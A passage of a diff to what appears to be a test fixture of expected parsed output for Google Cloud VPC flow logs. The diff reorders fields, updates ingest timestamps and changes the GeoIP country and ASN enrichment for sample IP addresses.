"{\"insertId\":\"bnj3cofh3cdjw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33064,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:40.125336665Z", - "end": "2019-06-14T03:44:40.243022993Z", - "id": "bnj3cofh3cdjw", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -7020,11 +7384,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 34906, @@ -7032,6 +7401,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415211380Z", + "original": "{\"insertId\":\"bnj3cofh3cdk3\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34906},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:50.642206049Z", + "end": "2019-06-14T03:48:50.757255245Z", + "id": "bnj3cofh3cdk3", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -7043,19 +7422,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.87.40.76" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -7066,36 +7456,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391547Z", - "original": "{\"insertId\":\"bnj3cofh3cdk3\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34906},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:50.642206049Z", - "end": "2019-06-14T03:48:50.757255245Z", - "id": "bnj3cofh3cdk3", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 58216, @@ -7109,6 +7483,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415211797Z", + "original": "{\"insertId\":\"bnj3cofh3cdkb\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":58216,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:36.865198297Z", + "end": "2019-06-14T03:49:36.982303071Z", + "id": "bnj3cofh3cdkb", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -7120,46 +7504,6 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:13.921Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391552500Z", - "original": "{\"insertId\":\"bnj3cofh3cdkb\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":58216,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:36.865198297Z", - "end": "2019-06-14T03:49:36.982303071Z", - "id": "bnj3cofh3cdkb", - "category": "network", - "type": "connection" } }, { @@ -7168,11 +7512,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -7250,7 +7599,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391558100Z", + "ingested": "2021-12-14T14:43:27.415212295Z", "original": "{\"insertId\":\"bnj3cofh3cdk4\",\"jsonPayload\":{\"bytes_sent\":\"60222\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075756033Z", @@ -7266,11 +7615,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -7348,7 +7702,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391562800Z", + "ingested": "2021-12-14T14:43:27.415212683Z", "original": "{\"insertId\":\"bnj3cofh3cdkf\",\"jsonPayload\":{\"bytes_sent\":\"61810\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"358\",\"reporter\":\"SRC\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500418290Z", @@ -7359,41 +7713,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 58216, - "bytes": 1467, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:fAWVAPDjem3VSliUyZGusurhkpQ=", - "bytes": 1467, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -7404,6 +7723,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -7424,8 +7746,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 58216, + "bytes": 1467, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391566200Z", + "ingested": "2021-12-14T14:43:27.415213119Z", "original": "{\"insertId\":\"bnj3cofh3cdkl\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":58216},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:49:36.865198297Z", @@ -7433,6 +7780,18 @@ "id": "bnj3cofh3cdkl", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:fAWVAPDjem3VSliUyZGusurhkpQ=", + "bytes": 1467, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -7447,11 +7806,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -7523,7 +7887,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391570400Z", + "ingested": "2021-12-14T14:43:27.415213640Z", "original": "{\"insertId\":\"bnj3cofh3cdk2\",\"jsonPayload\":{\"bytes_sent\":\"136558\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"243\",\"reporter\":\"DEST\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500418290Z", @@ -7534,16 +7898,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:13.921Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.14" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 34906, @@ -7557,6 +7956,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415214125Z", + "original": "{\"insertId\":\"bnj3cofh3cdko\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34906,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:50.642206049Z", + "end": "2019-06-14T03:48:50.757255245Z", + "id": "bnj3cofh3cdko", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -7568,7 +7977,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -7576,9 +7987,12 @@ "related": { "ip": [ "10.87.40.76", - "67.43.156.14" + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -7599,28 +8013,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391575400Z", - "original": "{\"insertId\":\"bnj3cofh3cdko\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34906,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:50.642206049Z", - "end": "2019-06-14T03:48:50.757255245Z", - "id": "bnj3cofh3cdko", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 52454, @@ -7634,6 +8038,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415214608Z", + "original": "{\"insertId\":\"bnj3cofh3cdke\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52454,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:40.779893091Z", + "end": "2019-06-14T03:42:40.888804332Z", + "id": "bnj3cofh3cdke", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -7645,25 +8059,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -7674,23 +8087,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391580300Z", - "original": "{\"insertId\":\"bnj3cofh3cdke\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52454,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:40.779893091Z", - "end": "2019-06-14T03:42:40.888804332Z", - "id": "bnj3cofh3cdke", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -7699,11 +8103,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34090, @@ -7711,6 +8120,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415215068Z", + "original": "{\"insertId\":\"bnj3cofh3cdka\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34090},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:37.712749588Z", + "end": "2019-06-14T03:46:37.827345444Z", + "id": "bnj3cofh3cdka", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -7722,46 +8141,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:13.921Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.13", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": 